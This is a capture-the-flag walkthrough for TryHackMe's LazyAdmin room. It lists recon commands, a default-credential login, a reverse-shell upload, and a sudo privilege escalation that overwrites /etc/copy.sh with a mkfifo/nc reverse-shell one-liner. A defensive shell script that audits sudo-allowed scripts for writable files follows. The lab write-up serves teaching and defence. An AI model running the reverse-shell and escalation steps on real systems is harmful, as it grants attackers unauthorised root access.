CTF Walk Through | HackProof Academy



05/12/2024 Shad Hussain
CTF Walk Through - LazyAdmin - THM

Room Link : https://tryhackme.com/r/room/lazyadmin

STEP1
nmap 10.10.87.228

FINDING
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
--------------------------------------------------------------------------------------------------
STEP2
dirb http://10.10.87.228

FINDING
==> DIRECTORY: http://10.10.87.228/content/as/
==> DIRECTORY: http://10.10.87.228/content/attachment/
--------------------------------------------------------------------------------------------------
STEP3
Log in at http://10.10.87.228/content/as/ with:
manager
password123
--------------------------------------------------------------------------------------------------
STEP4
Visit: http://10.10.87.228/content/as/?type=media_center
Upload a reverse shell.
-- Start the listener, then open http://10.10.87.228/content/attachment/
-- Find the uploaded file and click it to get the reverse shell.
--------------------------------------------------------------------------------------------------
STEP5
sudo -l

FINDING
(ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl
--------------------------------------------------------------------------------------------------
STEP6
cat /home/itguy/backup.pl

FINDING
#!/usr/bin/perl
system("sh", "/etc/copy.sh");
--------------------------------------------------------------------------------------------------
STEP7
cat /etc/copy.sh

FINDING
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.0.0.0 5554 >/tmp/f
--------------------------------------------------------------------------------------------------
STEP8
cd /etc
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.87.228 5554 >/tmp/f" > copy.sh

Open a listener in a new terminal:
nc -nvlp 5554
--------------------------------------------------------------------------------------------------
STEP9
sudo /usr/bin/perl /home/itguy/backup.pl

The new terminal receives a root shell.
--------------------------------------------------------------------------------------------------
whoami
root
cd /root
cat root.txt
--------------------------------------------------------------------------------------------------
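
Step 8 works only because the low-privileged shell user can overwrite /etc/copy.sh, which backup.pl then runs as root through the NOPASSWD rule from step 5. The following added example (not part of the original walkthrough) is a defender-side check that takes a script allowed in sudoers and reports whether it, or any absolute path it quotes, is group- or world-writable; the function names and the temp-dir fixture are constructed for illustration.

```sh
#!/bin/sh
# Added example: audit the files a sudo-allowed script executes as root.

# Return 0 if FILE is writable by group or other (ls mode chars 6 and 9).
writable_by_others() {
    perms=$(ls -ld "$1" 2>/dev/null | cut -c6,9)
    case "$perms" in *w*) return 0 ;; *) return 1 ;; esac
}

# Print every double-quoted absolute path that appears in SCRIPT.
referenced_paths() {
    grep -o '"/[^"]*"' "$1" | tr -d '"' | sort -u
}

# Print "WRITABLE <path>" for SCRIPT and each file it references that a
# non-owner can modify. Returns 1 if anything was reported, else 0.
audit_sudo_script() {
    findings=$( { printf '%s\n' "$1"; referenced_paths "$1"; } |
        while IFS= read -r f; do
            if [ -e "$f" ] && writable_by_others "$f"; then
                printf 'WRITABLE %s\n' "$f"
            fi
        done )
    if [ -n "$findings" ]; then
        printf '%s\n' "$findings"
        return 1
    fi
    return 0
}

# Constructed fixture shaped like steps 6-7: a Perl wrapper that runs a
# helper script. Both live in a private temp dir, not /home or /etc.
make_fixture() {
    d=$(mktemp -d)
    printf 'echo "backup placeholder"\n' > "$d/copy.sh"
    printf '#!/usr/bin/perl\nsystem("sh", "%s/copy.sh");\n' "$d" > "$d/backup.pl"
    chmod 755 "$d/backup.pl"
    chmod "$1" "$d/copy.sh"      # $1 = mode to give the helper script
    printf '%s\n' "$d"
}

# Demo run: a world-writable helper is reported.
demo_dir=$(make_fixture 777)
audit_sudo_script "$demo_dir/backup.pl" || true
rm -rf "$demo_dir"
```

On a real host, run `audit_sudo_script` against each script path listed by `sudo -l`; any reported file should be owned by root with mode 755 or stricter.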
